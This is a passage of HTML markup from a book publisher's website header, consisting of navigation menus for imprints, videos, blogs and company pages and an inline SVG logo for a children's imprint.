</span></span><ul id="site-header__sub-menu-703625127" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-703625127"><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/avalon-travel/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Avalon Travel">Avalon Travel</a><span id="expand-site-header__sub-menu-812979442" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-812979442" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-812979442" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-106530554  desc-arrow-1830177397">
	<title id="titlet-arrow-106530554">Arrow Icon</title>
	<desc id="desc-arrow-1830177397">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/basic-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Basic Books">Basic Books</a><span id="expand-site-header__sub-menu-1239378948" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1239378948" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1239378948" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1169060039  desc-arrow-647317268">
	<title id="titlet-arrow-1169060039">Arrow Icon</title>
	<desc id="desc-arrow-647317268">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/hachette-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Books">Hachette Books</a><span id="expand-site-header__sub-menu-145118522" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-145118522" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-145118522" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1937031362  desc-arrow-1597758290">
	<title id="titlet-arrow-1937031362">Arrow Icon</title>
	<desc id="desc-arrow-1597758290">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/publicaffairs/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="PublicAffairs">PublicAffairs</a><span id="expand-site-header__sub-menu-408061437" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-408061437" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-408061437" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-198314752  desc-arrow-3345278176">
	<title id="titlet-arrow-198314752">Arrow Icon</title>
	<desc id="desc-arrow-3345278176">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/running-press/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Running Press">Running Press</a><span id="expand-site-header__sub-menu-1629214337" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1629214337" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1629214337" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-4113146617  desc-arrow-1176855516">
	<title id="titlet-arrow-4113146617">Arrow Icon</title>
	<desc id="desc-arrow-1176855516">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li>	</ul>
</li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/video/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Videos">Videos</a><span id="expand-site-header__sub-menu-1317606002" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1317606002" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1317606002" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-187318606  desc-arrow-701705593">
	<title id="titlet-arrow-187318606">Arrow Icon</title>
	<desc id="desc-arrow-701705593">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1317606002" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1317606002"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/author-inquiry/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Author Inquiry">Author Inquiry</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/book-trailers/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Book Trailers">Book Trailers</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/the-current/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="The Current">The Current</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/meet-the-author-video/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Meet the Author">Meet the Author</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/wordsmithing/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Wordsmithing">Wordsmithing</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/bold-recommendations/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Bold Recommendations">Bold Recommendations</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="/landing-page/book-your-next-romance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Book Your Next Romance">Book Your Next Romance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="/landing-page/shelf-life/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Shelf Life">Shelf Life</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="/landing-page/hbg-films/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="HBG Films">HBG Films</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/recommendations-from-the-african-diaspora/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Recommendations from the African Diaspora">Recommendations from the African Diaspora</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/blogs-hub" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Blogs">Blogs</a><span id="expand-site-header__sub-menu-1859375506" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1859375506" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1859375506" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2424404760  desc-arrow-1390277319">
	<title id="titlet-arrow-2424404760">Arrow Icon</title>
	<desc id="desc-arrow-1390277319">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1859375506" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1859375506"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.novelsuspects.com/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Novel Suspects">Novel Suspects</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/the-current/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="The Current">The Current</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/open-book/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Open Book">Open Book</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/about-hachette-book-group-2/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="About">About</a><span id="expand-site-header__sub-menu-752224604" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-752224604" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-752224604" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1375059408  desc-arrow-1679805331">
	<title id="titlet-arrow-1375059408">Arrow Icon</title>
	<desc id="desc-arrow-1679805331">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-752224604" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-752224604"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/about-hachette-book-group-2/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="About Hachette Book Group">About Hachette Book Group</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/about/careers/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Careers">Careers</a></span></li></ul>
</li></ul></div>	</nav>
</header>

<header id="site-header" class="site-header imprint-header little-brown-books-for-young-readers ">
	<a href="#content" class="skiplink">Skip to Main Content</a>
	
<div class="site-header__top site-header__default" data-toggle-element="site-header__search">
	<div class="site-header__mobile-menu-toggle">
		<button class="site-header__hamburger toggleable" data-toggle-target="site-header__mobile-menu" data-toggle-block="site-header__mobile-menu">&#9776;</button>
	</div>

	<h2 class="site-header__branding">
		
	<a class="site-header__branding--imprint-header-logo__desktop" href="https://www.lbyr.com/">
		<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 288 98.1"><defs><style>.lbyr-cls-1{fill:#c48d42;}.lbyr-cls-2{fill:#2d2d2e;}.lbyr-cls-3{fill:#fff;}</style></defs><title>lbyr4</title><path class="lbyr-cls-1" d="M165.82,29.56a28,28,0,1,1-55.9,0,28,28,0,1,1,55.9,0m-61.84,0a28,28,0,1,1-55.9,0,28,28,0,1,1,55.9,0"/><path class="lbyr-cls-2" d="M99.09,29.56a23,23,0,1,1-46.07,0,23,23,0,1,1,46.07,0m61.81,0a23,23,0,1,1-46.06,0,23,23,0,1,1,46.06,0"/><path class="lbyr-cls-3" d="M87.53,43.08c-.13.56-.36.7-.77.7-2.17,0-13.45-.14-16.3-.14l-4.93.21V41.19c0-.32.18-.42.44-.42.55,0,3.54.08,4.76-.06a18.87,18.87,0,0,0,.14-2.51V19.77a18.87,18.87,0,0,0-.14-2.51c-1.22-.13-4.21-.13-4.76-.13-.26,0-.44-.1-.44-.43V14.19c1.35.05,6.42.14,7.42.14s5.49-.09,6.9-.14V16.7c0,.33-.18.43-.46.43-.54,0-3.36,0-4.58.13a12.78,12.78,0,0,0-.14,2.47V37.5c0,1.39.09,2.41.14,2.93.36,0,1.81.14,2.94.14h6.89l1-7.36,2.81.23c.27.05.22.33.17.6Z"/><path class="lbyr-cls-3" d="M139.42,29.79h-3.94v7.27a14.58,14.58,0,0,0,.35,3.3,26,26,0,0,0,4.76.34c3.48,0,6.27-1.36,6.27-5,0-4.23-3.33-5.87-7.44-5.87m3.46-11.6a6.41,6.41,0,0,0-3.83-1,22.46,22.46,0,0,0-3.57.32v9.19c.72.09,3,.14,3.85.14a5,5,0,0,0,5.31-5.2,4.18,4.18,0,0,0-1.76-3.48m-2.15,25.56c-1.77,0-5.31-.14-7.11-.14s-6.1.1-6.91.14V41.24c0-.33.22-.42.45-.42.59,0,3.15,0,4.37-.14a12.91,12.91,0,0,0,.14-2.51V19.91a18.49,18.49,0,0,0-.23-2.65c-.95-.09-3.92-.14-4.33-.14s-.44-.09-.44-.32V14.2c.85,0,5.32.14,6.45.14s4.67-.14,5.75-.14c3.94,0,5.45.6,7,1.72a6.64,6.64,0,0,1,2.62,5.15,7,7,0,0,1-5.2,7c5.25.6,7.37,4.23,7.37,7.62,0,5.53-4.37,8-10,8"/><path class="lbyr-cls-2" d="M45.88,81.24a2.2,2.2,0,0,0-.8-.51,22.83,22.83,0,0,0,.8-2.82c.07-.24.21-.33.54-.33a1.4,1.4,0,0,1,.86.78A19,19,0,0,1,45.88,81.24Z"/><path class="lbyr-cls-2" d="M.92,79.29a47.33,47.33,0,0,0,0-8.83,6,6,0,0,0,2,0,71.38,71.38,0,0,0-.07,7.26,16.29,16.29,0,0,0,3.77-.2,6,6,0,0,0,0,1.74C4.49,79.19,2.85,79.23.92,79.29Z"/><path class="lbyr-cls-2" d="M10.19,79.25a14,14,0,0,0-2,0,51.76,51.76,0,0,0,0-8.72,6.05,6.05,0,0,0,2.08,0A46.4,46.4,0,0,0,10.19,79.25Z"/><path class="lbyr-cls-2" d="M16.75,71.93c-.06,1.31-.1,2.45-.08,3.63s.08,2.28.19,3.69a13.59,13.59,0,0,0-2,0c.1-1.28.14-2.56.16-3.79s0-2.37,0-3.51c-.77,0-2.17,0-2.94.06a6.55,6.55,0,0,0,0-1.53c1.38.07,2.61.11,3.81.11s2.51,0,3.91-.11a7.74,7.74,0,0,0,0,1.52C18.78,72,17.82,71.93,16.75,71.93Z"/><path class="lbyr-cls-2" d="M25.81,71.93c0,1.31-.08,2.45-.07,3.63s.07,2.28.19,3.69a13.59,13.59,0,0,0-2,0c.1-1.28.14-2.56.16-3.79s0-2.37,0-3.51c-.77,0-2.17,0-2.94.06a6,6,0,0,0,0-1.53c1.38.07,2.6.11,3.81.11s2.51,0,3.91-.11a9.67,9.67,0,0,0,0,1.52C27.85,72,26.89,71.93,25.81,71.93Z"/><path class="lbyr-cls-2" d="M30.69,79.29a50,50,0,0,0,0-8.83,5.92,5.92,0,0,0,2,0,71.38,71.38,0,0,0-.07,7.26,16.35,16.35,0,0,0,3.78-.2,6,6,0,0,0,0,1.74C34.25,79.19,32.6,79.23,30.69,79.29Z"/><path class="lbyr-cls-2" d="M38,79.3c.11-1.53.2-3,.2-4.49A41.23,41.23,0,0,0,38,70.43a23.68,23.68,0,0,0,5.05,0,5.11,5.11,0,0,0,0,1.7,29.07,29.07,0,0,0-3.18-.08c0,.7,0,1.19,0,1.92a19.12,19.12,0,0,0,2.83-.15,7.52,7.52,0,0,0,0,1.71,27.9,27.9,0,0,0-2.83-.12c0,.83,0,1.45.07,2.28a17.53,17.53,0,0,0,3.4-.13,3.71,3.71,0,0,0,0,1.69C41.45,79.17,39.83,79.22,38,79.3Z"/><path class="lbyr-cls-2" d="M55.9,79.35a23.41,23.41,0,0,1-2.53-.22c.12-1.58.18-2.88.19-4.14s-.05-2.69-.17-4.36a19.66,19.66,0,0,1,2.39-.24c1.46,0,3.18.44,3.18,2.36a2.32,2.32,0,0,1-1.49,1.84,2.35,2.35,0,0,1,1.9,2C59.37,78.74,57.62,79.35,55.9,79.35Zm-.1-4h-.58V76.6c0,.44,0,.87.07,1.31a5.35,5.35,0,0,0,.79.06c.73,0,1.63-.28,1.63-1.38C57.71,75.8,56.86,75.34,55.8,75.34Zm0-3.59h-.5c0,.4-.05.79-.05,1.15s0,.73,0,1.11c.21,0,.44,0,.5,0,.82,0,1.43-.34,1.43-1.15S56.57,71.75,55.78,71.75Z"/><path class="lbyr-cls-2" d="M66.9,79.6c-.45-.62-.88-1.24-1.33-1.85A22.47,22.47,0,0,0,64,75.83h-.7a24.06,24.06,0,0,0,.2,3.44,14.16,14.16,0,0,0-2.06,0,51.45,51.45,0,0,0,0-8.51,9.51,9.51,0,0,1,2.52-.4c1.64,0,3.12.8,3.12,2.6a2.85,2.85,0,0,1-1.39,2.34c.42.54.82,1,1.27,1.55s1,1.08,1.6,1.68A6.76,6.76,0,0,0,66.9,79.6Zm-2-7.54a1.24,1.24,0,0,0-.93-.33,3.28,3.28,0,0,0-.63.06c0,1,0,1.72,0,2.68h.29c1.07,0,1.67-.5,1.67-1.49A1.2,1.2,0,0,0,64.91,72.06Z"/><path class="lbyr-cls-2" d="M74,79.33a4.47,4.47,0,1,1,0-8.94,4.39,4.39,0,0,1,4.53,4.49A4.47,4.47,0,0,1,74,79.33Zm0-7.49a3,3,0,1,0,2.75,3A2.78,2.78,0,0,0,74,71.84Z"/><path class="lbyr-cls-2" d="M89.84,79.23a8.09,8.09,0,0,0-1.65,0c-.71-2.4-1.37-4.45-2.15-6.37-.77,2-1.48,4.16-2.16,6.34a11.49,11.49,0,0,0-1.66,0,65.3,65.3,0,0,0-2.47-8.52,5,5,0,0,0,2-.46,48.84,48.84,0,0,0,1.43,6.44,39.86,39.86,0,0,0,1.89-6.16A4.87,4.87,0,0,0,87,70.41a49.05,49.05,0,0,0,1.93,6.25,50.46,50.46,0,0,0,1.4-6.34,5.82,5.82,0,0,0,2,.41A75.49,75.49,0,0,0,89.84,79.23Z"/><path class="lbyr-cls-2" d="M102.39,79.12a3.76,3.76,0,0,0-1.54.32A72.07,72.07,0,0,0,96,73.3a50.26,50.26,0,0,0,.13,6,6.31,6.31,0,0,0-1.94,0,70.68,70.68,0,0,0,.2-8.82,5.51,5.51,0,0,0,1.67,0,64.05,64.05,0,0,0,4.7,6.2,46.71,46.71,0,0,0-.18-6.25,4.53,4.53,0,0,0,1.87,0A82.26,82.26,0,0,0,102.39,79.12Z"/><path class="lbyr-cls-2" d="M115.35,79.57a18.62,18.62,0,0,0-.86-2.48c-1,0-2.43,0-3.37,0a19,19,0,0,0-.88,2.46,8.26,8.26,0,0,0-1.87-.7,69.82,69.82,0,0,0,3.47-8.49,4.26,4.26,0,0,0,1.85,0c1,2.51,2.31,5.94,3.49,8.51A7.18,7.18,0,0,0,115.35,79.57Zm-2.53-7.11c-.42.9-.92,2.51-1.2,3.3a23.22,23.22,0,0,0,2.36,0C113.7,74.92,113.21,73.36,112.82,72.46Z"/><path class="lbyr-cls-2" d="M127.37,79.12a3.67,3.67,0,0,0-1.54.32A72.12,72.12,0,0,0,121,73.3a52.45,52.45,0,0,0,.13,6,6.31,6.31,0,0,0-1.94,0,67,67,0,0,0,.19-8.82,5.58,5.58,0,0,0,1.68,0,64,64,0,0,0,4.71,6.2,46.71,46.71,0,0,0-.18-6.25,4.53,4.53,0,0,0,1.87,0A79.63,79.63,0,0,0,127.37,79.12Z"/><path class="lbyr-cls-2" d="M133.07,79.33a14.4,14.4,0,0,1-2.95-.37c.08-1.21.12-2.68.14-4.1s0-3-.11-4a10.17,10.17,0,0,1,3.28-.51c2.75,0,5,1.29,5,4.32S136,79.33,133.07,79.33Zm.36-7.49A7.27,7.27,0,0,0,132,72c0,1-.09,2-.09,3s0,1.83.09,2.8a6.15,6.15,0,0,0,1.13.09c2.11,0,3.49-1.06,3.49-3.17A2.92,2.92,0,0,0,133.43,71.84Z"/><path class="lbyr-cls-2" d="M151.39,72.87a3.14,3.14,0,0,0-2.39-1,2.88,2.88,0,0,0-2.88,3,3,3,0,0,0,3.06,3,3.47,3.47,0,0,0,2.14-.81,3,3,0,0,0,.76,1.32,5.47,5.47,0,0,1-2.92,1c-2.94,0-4.84-1.72-4.84-4.49a4.43,4.43,0,0,1,4.74-4.45,5.22,5.22,0,0,1,3.16,1.06A3.76,3.76,0,0,0,151.39,72.87Z"/><path class="lbyr-cls-2" d="M158,79.33a4.46,4.46,0,0,1-4.53-4.45,4.55,4.55,0,0,1,9.09,0A4.48,4.48,0,0,1,158,79.33Zm0-7.49a3,3,0,1,0,2.75,3A2.78,2.78,0,0,0,158,71.84Z"/><path class="lbyr-cls-2" d="M173.58,79.37c-.12-2-.33-4.42-.53-6.52-.79,2-1.7,4.68-2.26,6.43a8.77,8.77,0,0,0-1.7,0c-.53-1.76-1.38-4.21-2.28-6.4-.14,2.21-.34,4.66-.41,6.46a6.3,6.3,0,0,0-1.87-.12c.47-2.8.83-6,1.08-8.81a3.78,3.78,0,0,0,1.89,0A68.34,68.34,0,0,0,170,77.32a51.5,51.5,0,0,0,2.27-6.86,4.17,4.17,0,0,0,2,0c.37,3.31.68,5.72,1.19,8.72A6.25,6.25,0,0,0,173.58,79.37Z"/><path class="lbyr-cls-2" d="M180.19,76.1c-.13,0-.33,0-.65,0,0,1,.09,2,.18,3.22a8.12,8.12,0,0,0-2,0,59.47,59.47,0,0,0,0-8.65,13.12,13.12,0,0,1,2.57-.29c1.76,0,3.36.93,3.36,2.83S182,76.1,180.19,76.1Zm.09-4.37a5.11,5.11,0,0,0-.69,0c0,1-.05,1.89-.05,2.88a3.63,3.63,0,0,0,.67.07,1.5,1.5,0,0,0,1.63-1.54A1.44,1.44,0,0,0,180.28,71.73Z"/><path class="lbyr-cls-2" d="M190.81,79.57a17.23,17.23,0,0,0-.87-2.48c-1,0-2.42,0-3.36,0a20.64,20.64,0,0,0-.88,2.46,8.16,8.16,0,0,0-1.88-.7,70,70,0,0,0,3.48-8.49,4.26,4.26,0,0,0,1.85,0c1,2.51,2.31,5.94,3.49,8.51A7.32,7.32,0,0,0,190.81,79.57Zm-2.53-7.11c-.41.9-.92,2.51-1.2,3.3a23.22,23.22,0,0,0,2.36,0C189.16,74.92,188.67,73.36,188.28,72.46Z"/><path class="lbyr-cls-2" d="M202.83,79.12a3.67,3.67,0,0,0-1.54.32,72.12,72.12,0,0,0-4.83-6.14,50.26,50.26,0,0,0,.13,6,6.25,6.25,0,0,0-1.93,0,70.62,70.62,0,0,0,.18-8.82,5.58,5.58,0,0,0,1.68,0,62.43,62.43,0,0,0,4.71,6.2,48.45,48.45,0,0,0-.19-6.25,4.58,4.58,0,0,0,1.88,0A77.17,77.17,0,0,0,202.83,79.12Z"/><path class="lbyr-cls-2" d="M209.71,75.82a26,26,0,0,0,.11,3.46,5.6,5.6,0,0,0-2,0,25.75,25.75,0,0,0,.09-3.46,32.25,32.25,0,0,0-3.3-4.88,5.25,5.25,0,0,0,1.74-.75,23.59,23.59,0,0,0,2.48,4.19,23.22,23.22,0,0,0,2.44-4.2A4.78,4.78,0,0,0,213,71,30,30,0,0,0,209.71,75.82Z"/><path class="lbyr-cls-2" d="M18.71,96.18a17.41,17.41,0,0,1-2-.17,43.91,43.91,0,0,0,.15-4.4,37.41,37.41,0,0,0-.13-3.84,13.81,13.81,0,0,1,1.89-.17c1.35,0,2.88.39,2.88,2.09a2,2,0,0,1-1.55,1.89A2.22,2.22,0,0,1,22,93.68C22,95.61,20.33,96.18,18.71,96.18ZM18.62,92a4.58,4.58,0,0,0-.78,0v1.13c0,.66,0,1.61.08,2a2.38,2.38,0,0,0,1,.17,1.74,1.74,0,0,0,2-1.75C20.88,92.52,19.59,92,18.62,92Zm0-3.7a3.06,3.06,0,0,0-.66.06c0,.57-.07.84-.07,1.45v1.4a3.26,3.26,0,0,0,.69.07c.86,0,1.79-.39,1.79-1.5S19.54,88.33,18.58,88.33Z"/><path class="lbyr-cls-2" d="M28,96.17a4.23,4.23,0,0,1-4.24-4.27,4.26,4.26,0,1,1,8.51,0A4.25,4.25,0,0,1,28,96.17Zm0-7.73c-2.11,0-3.08,1.75-3.08,3.45A3.11,3.11,0,1,0,28,88.44Z"/><path class="lbyr-cls-2" d="M38.32,96.17a4.23,4.23,0,0,1-4.24-4.27,4.26,4.26,0,1,1,8.51,0A4.25,4.25,0,0,1,38.32,96.17Zm0-7.73c-2.11,0-3.07,1.75-3.07,3.45a3.11,3.11,0,1,0,3.07-3.45Z"/><path class="lbyr-cls-2" d="M50.41,96.24a47.27,47.27,0,0,0-4.44-4c0,1.27.05,2.67.15,3.85a8.31,8.31,0,0,0-1.32,0A36.07,36.07,0,0,0,45,91.88a38.17,38.17,0,0,0-.13-4.14,8.31,8.31,0,0,0,1.32,0c-.09,1-.17,2.44-.17,3.49a25.17,25.17,0,0,0,3.69-3.68,4.71,4.71,0,0,0,.77.84c-1.25,1-2.37,2.15-3.52,3.23a37.48,37.48,0,0,0,4.31,3.75A3.54,3.54,0,0,0,50.41,96.24Z"/><path class="lbyr-cls-2" d="M55.25,96.14a3.17,3.17,0,0,1-2.4-1,2.19,2.19,0,0,0,.54-.9,2.38,2.38,0,0,0,1.9,1A1.41,1.41,0,0,0,56.81,94c0-1-.89-1.5-1.66-2-1-.6-1.95-1.09-1.95-2.48s1.35-1.92,2.46-1.92a2.82,2.82,0,0,1,2,.77,2.51,2.51,0,0,0-.52.86,1.89,1.89,0,0,0-1.51-.84c-.8,0-1.34.4-1.34,1.2s.9,1.26,1.53,1.64c1.1.66,2.08,1.16,2.08,2.63A2.44,2.44,0,0,1,55.25,96.14Z"/><path class="lbyr-cls-2" d="M64.79,88.63c0,1,0,1.93,0,2.88,1,0,2.06,0,3.1-.08a3.44,3.44,0,0,0,0,1c-1,0-2.06-.06-3.1-.06,0,1.13,0,2.49.07,3.71a5.35,5.35,0,0,0-1.2,0c.12-1.52.15-3.07.15-4.6,0-1.26-.1-2.5-.18-3.74a36.22,36.22,0,0,0,4.42,0,3.29,3.29,0,0,0,0,1C67.2,88.63,65.6,88.6,64.79,88.63Z"/><path class="lbyr-cls-2" d="M74,96.17a4.23,4.23,0,0,1-4.25-4.27,4.26,4.26,0,1,1,8.51,0A4.25,4.25,0,0,1,74,96.17Zm0-7.73c-2.12,0-3.08,1.75-3.08,3.45a3.1,3.1,0,1,0,6.18,0C77.09,90.19,76.11,88.44,74,88.44Z"/><path class="lbyr-cls-2" d="M85.66,96.25c-.47-.69-.93-1.35-1.42-2a15.49,15.49,0,0,0-1.36-1.66,2.16,2.16,0,0,0-.59-.08,3.12,3.12,0,0,0-.66,0A34.42,34.42,0,0,0,81.78,96a9.69,9.69,0,0,0-1.32,0c.13-1.6.15-2.9.15-4.33a30.53,30.53,0,0,0-.15-3.85,10.62,10.62,0,0,1,2.19-.32c1.49,0,2.8.75,2.8,2.37a2.57,2.57,0,0,1-1.58,2.28c.17.2.7.87,1.25,1.55a19.48,19.48,0,0,0,1.59,1.8A3.6,3.6,0,0,0,85.66,96.25ZM84,88.9a1.66,1.66,0,0,0-1.32-.59,3.32,3.32,0,0,0-1,.12c-.05,1.22-.05,2.21-.05,3.31a2.91,2.91,0,0,0,.64.07c1.29,0,2-.64,2-1.89A1.69,1.69,0,0,0,84,88.9Z"/><path class="lbyr-cls-2" d="M95.7,92.76A31.07,31.07,0,0,0,95.8,96a4.94,4.94,0,0,0-1.33,0,32.58,32.58,0,0,0,.1-3.28c-.86-1.46-2.15-3.44-3.13-4.77.36-.14.71-.31,1.07-.47.85,1.51,1.75,3,2.61,4.43.87-1.43,1.79-2.92,2.64-4.43.35.16.7.33,1.07.47C97.85,89.32,96.56,91.3,95.7,92.76Z"/><path class="lbyr-cls-2" d="M104,96.17a4.23,4.23,0,0,1-4.24-4.27,4.26,4.26,0,1,1,8.51,0A4.25,4.25,0,0,1,104,96.17Zm0-7.73c-2.11,0-3.08,1.75-3.08,3.45A3.11,3.11,0,1,0,104,88.44Z"/><path class="lbyr-cls-2" 